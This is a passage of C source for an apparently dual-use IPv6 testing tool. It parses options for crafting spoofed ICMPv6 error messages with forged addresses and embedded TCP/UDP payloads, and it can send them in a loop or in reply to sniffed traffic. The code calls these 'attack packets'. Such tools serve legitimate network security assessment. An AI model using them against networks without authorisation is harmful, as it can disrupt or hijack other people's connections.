in6_addr targetaddr, peeraddr; unsigned char redirpreflen, targetpreflen; unsigned int targetport, peerport; uint16_t targetportl, targetporth, peerportl, peerporth, auxint16; uint16_t tcpurg, tcpwin, icmp6id, icmp6seq; uint32_t tcpseq, tcpack; uint8_t tcpflags=0, ip6hoplimit; struct ip6_hdr *rhipv6; struct udp_hdr *rhudp; struct tcp_hdr *rhtcp; struct icmp6_hdr *rhicmp6; unsigned int nredirs, redirs; unsigned int rhbytes, rhlength, currentsize; unsigned char rh_hoplimit; unsigned char rhbuff[100]; /* This one must be able to hold the IPv6 header and the upper layer header */ /* Variables used for learning the default router */ struct iface_data idata; struct ether_addr router_ether, rs_ether; struct in6_addr router_ipv6, rs_ipv6; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; struct dlt_null *dlt_null; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int ntargets, sources, nsources, targets, nsleep; uint16_t mask; uint8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char floodt_f=0, listen_f = 0, multicastdst_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char targetprefix_f=0, hoplimit_f=0, newdata_f=0, floods_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct filters filters; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ int r, sel; fd_set sset, rset; #if defined(sun) || defined(__sun) struct timeval timeout; #endif struct target_ipv6 targetipv6; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-addr", required_argument, 0, 's'}, {"dst-addr", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'c'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"icmp6", required_argument, 0, 't'}, {"icmp6-dest-unreach", required_argument, 0, 'e'}, {"icmp6-packet-too-big", no_argument, 0, 'E'}, {"icmp6-time-exceeded", required_argument, 0, 'A'}, {"icmp6-param-problem", no_argument, 0, 'R'}, {"mtu", required_argument, 0, 'm'}, {"pointer", required_argument, 0, 'O'}, {"sanity-filters", no_argument, 0, 'f'}, {"payload-type", required_argument, 0, 'p'}, {"payload-size", required_argument, 0, 'P'}, {"no-payload", no_argument, 0, 'n'}, {"ipv6-hlim", required_argument, 0, 'C'}, {"target-addr", required_argument, 0, 'r'}, {"peer-addr", required_argument, 0, 'x'}, {"target-port", required_argument, 0, 'o'}, {"peer-port", required_argument, 0, 'a'}, {"tcp-flags", required_argument, 0, 'X'}, {"tcp-seq", required_argument, 0, 'q'}, {"tcp-ack", required_argument, 0, 'Q'}, {"tcp-urg", required_argument, 0, 'V'}, {"tcp-win", required_argument, 0, 'w'}, {"resp-mcast", no_argument, 0, 'M'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"sanity-filters", no_argument, 0, 'f'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:c:u:U:H:y:S:D:r:t:e:EA:R:m:O:p:P:nC:x:o:a:X:q:Q:V:w:MO:j:k:J:K:b:g:B:G:flz:Lvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } hoplimit=64+random()%180; while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } if(idata.srcpreflen == 64) useaddrkey_f= 1; sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'c': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'r': /* Target address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Redirected Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &targetaddr) <= 0){ puts("inet_pton(): Redirected Address not valid"); exit(EXIT_FAILURE); } targetaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ redirpreflen = atoi(charptr); if(redirpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&targetaddr, redirpreflen); redirprefix_f=1; } break; case 't': /* ICMPv6 Type and Code */ if((charptr = strtok_r(optarg, ":", &lasts)) == NULL){ puts("Error in ICMPv6 message Type/Code"); exit(EXIT_FAILURE); } icmp6type= atoi(charptr); icmp6type_f=1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ icmp6code= atoi(charptr); icmp6code_f=1; } break; case 'e': /* ICMPv6 Destination Unreachable */ icmp6type= 1; icmp6type_f= 1; icmp6code= atoi(optarg); icmp6code_f= 1; break; case 'E': /* ICMPv6 Packet Too Big */ icmp6type= 2; icmp6type_f= 1; icmp6code= 0; icmp6code_f= 1; break; case 'A': /* ICMPv6 Time Exceeded */ icmp6type= 3; icmp6type_f= 1; icmp6code= atoi(optarg); icmp6code_f= 1; break; case 'R': /* ICMPv6 Parameter Problem */ icmp6type=4; icmp6type_f= 1; icmp6code= atoi(optarg); icmp6code_f= 1; break; case 'm': /* Next-Hop MTU (for ICMPv6 PTB messages) */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'MTU' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ mtu = ul_res; mtu_f=1; } break; case 'O': /* Pointer (for ICMPv6 "Parameter Problem" messages) */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'Pointer' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ pointer = ul_res; pointer_f=1; } break; case 'p': /* Protocol used in the ICMPv6 Payload */ if(strcmp(optarg, "TCP") == 0 || strcmp(optarg, "tcp") == 0) rhtcp_f = 1; else if(strcmp(optarg, "ICMP6") == 0 || strcmp(optarg, "ICMPv6") == 0 || \ strcmp(optarg, "icmpv6") == 0 || strcmp(optarg, "icmp6") == 0) rhicmp6_f = 1; else if(strcmp(optarg, "UDP") == 0 || strcmp(optarg, "udp") == 0) rhudp_f = 1; else if(strcmp(optarg, "IP6") == 0 || strcmp(optarg, "ip6") == 0 || \ strcmp(optarg, "IPv6") == 0 || strcmp(optarg, "ipv6") == 0){ rhip6_f= 1; } else{ puts("Unsupported protocol in option '-p'"); exit(EXIT_FAILURE); } break; case 'P': /* Payload Size*/ rhlength= atoi(optarg); rhlength= (rhlength<<3) >> 3; /* The Redirected Header has a granularity of 8 bytes */ rhlength_f= 1; break; case 'n': /* No ICMPv6 Payload */ nopayload_f=1; break; case 'C': /* Hop Limit of the IPv6 Payload */ ip6hoplimit= atoi(optarg); ip6hoplimit_f=1; break; case 'x': /* Source Address of the ICMPv6 payload */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } peeraddr= targetipv6.ip6; peeraddr_f = 1; break; case 'o': /* Target port */ if((charptr = strtok_r(optarg, ":-", &lasts)) == NULL){ printf("Error in TCP/UDP target port"); exit(EXIT_FAILURE); } targetportl= atoi(charptr); targetportl_f= 1; if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ targetporth= targetportl; } else{ targetporth=atoi(charptr); targetporth_f=1; if(targetportl > targetporth){ auxint16= targetportl; targetportl= targetporth; targetporth= auxint16; } } break; case 'a': /* Peer port */ if((charptr = strtok_r(optarg, ":-", &lasts)) == NULL){ printf("Error in TCP/UDP peer port"); exit(EXIT_FAILURE); } peerportl= atoi(charptr); peerportl_f= 1; if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ peerporth= peerportl; } else{ peerporth=atoi(charptr); peerporth_f=1; if(peerportl > peerporth){ auxint16= peerportl; peerportl= peerporth; peerporth= auxint16; } } break; case 'X': /* TCP flags */ charptr = optarg; while(*charptr){ switch(*charptr){ case 'F': tcpflags= tcpflags | TH_FIN; break; case 'S': tcpflags= tcpflags | TH_SYN; break; case 'R': tcpflags= tcpflags | TH_RST; break; case 'P': tcpflags= tcpflags | TH_PUSH; break; case 'A': tcpflags= tcpflags | TH_ACK; break; case 'U': tcpflags= tcpflags | TH_URG; break; case 'X': /* No TCP flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } tcpflags_f=1; break; case 'q': /* TCP Sequence Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpseq = ul_res; tcpseq_f=1; } break; case 'Q': /* TCP Acknowledgement Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpack = ul_res; tcpack_f=1; } break; case 'V': /* TCP Urgent Pointer */ tcpurg= atoi(optarg); tcpurg_f= 1; break; case 'w': /* TCP Window */ tcpwin= atoi(optarg); tcpwin_f=1; break; case 'M': /* Respond to multicast packets */ respmcast_f=1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'f': /* Sanity filters */ sanityfilters_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("icmp6 needs root privileges to run."); exit(EXIT_FAILURE); } if(listen_f && !idata.iface_f){ puts("Must specify a network interface with the -i option when listening mode is selected"); exit(EXIT_FAILURE); } if(listen_f && loop_f){ puts("'Error: listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } if(!idata.dstaddr_f && !listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); srandom(time(NULL)); if(sanityfilters_f){ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many Source Address (block) filters while adding sanity filters."); exit(EXIT_FAILURE); } filters.blocksrc[filters.nblocksrc]= idata.srcaddr; filters.blocksrclen[filters.nblocksrc]=128; filters.nblocklinksrc++; } if(!sleep_f) nsleep=1; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(!nopayload_f && !(rhtcp_f || rhudp_f || rhicmp6_f)) rhdefault_f=1; if(!ip6hoplimit_f) ip6hoplimit=64+random()%180; if(!ip6length_f) ip6length=1460; if(!targetaddr_f) targetaddr= idata.dstaddr; if(!peeraddr_f){ if( inet_pton(AF_INET6, "::", &randprefix) <= 0){ puts("inet_pton(): Error while randomizing Destination Address of the ICMPv6 payload"); exit(EXIT_FAILURE); } randpreflen=0; randomize_ipv6_addr(&peeraddr, &randprefix, randpreflen); } if(rhtcp_f || rhdefault_f){ if(!tcpflags_f) tcpflags= tcpflags | TH_ACK; if(!tcpack_f) tcpack= random(); if(!tcpseq_f) tcpseq= random(); if(!tcpwin_f) tcpwin= ((uint16_t) random() + 1500) & (uint16_t)0x7f00; if(!peerportl_f){ peerportl= random(); peerporth= peerportl; } if(!targetportl_f){ targetportl= random(); targetporth= targetportl; } if(!tcpurg_f) tcpurg= 0; } if(rhudp_f){ if(!peerportl_f){ peerportl= random(); peerporth= peerportl; } if(!targetportl_f){ targetportl= random(); targetporth= targetportl; } } if(rhicmp6_f){ if(!icmp6id_f) icmp6id= random(); if(!icmp6seq_f) icmp6seq= random(); } if(!icmp6type_f){ icmp6type= ICMP6_PARAM_PROB; icmp6code= ICMP6_PARAMPROB_HEADER; } switch(icmp6type){ case ICMP6_PACKET_TOO_BIG: if(!mtu_f) mtu= 296; break; case ICMP6_PARAM_PROB: if(pointer_f) pointer= random()%40; break; case ICMP6_DST_UNREACH: case ICMP6_TIME_EXCEEDED: default: break; } if(rhtcp_f){ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_TCPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } } else if(rhudp_f){ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_UDPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } } else if(rhicmp6_f){ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } } else if(pcap_compile(idata.pfd, &pcap_filter, PCAP_IPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire an ICMPv6 error message if an IPv6 Destination Address was specified */ if(idata.dstaddr_f){ send_packet(&idata, NULL, NULL); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f){ if(idata.verbose_f) printf("Now sending ICMPv6 error messages every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata, NULL, NULL); } exit(EXIT_SUCCESS); } } if(listen_f){ if(idata.verbose_f){ print_filters(&idata, &filters); if(rhtcp_f){ puts("Listening to incoming TCP packets..."); } else if(rhudp_f){ puts("Listening to incoming UDP packets..."); } else if(rhicmp6_f){ puts("Listening to incoming ICMPv6 packets..."); } else{ puts("Listening to incoming IPv6 packets..."); } } FD_ZERO(&sset); FD_SET(idata.fd, &sset); while(listen_f){ rset= sset; #if defined(sun) || defined(__sun) timeout.tv_usec=10000; timeout.tv_sec= 0; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ #else if((sel=select(idata.fd+1, &rset, NULL, NULL, NULL)) == -1){ #endif if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif /* Read a Neighbor Solicitation message */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); accepted_f=0; if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, 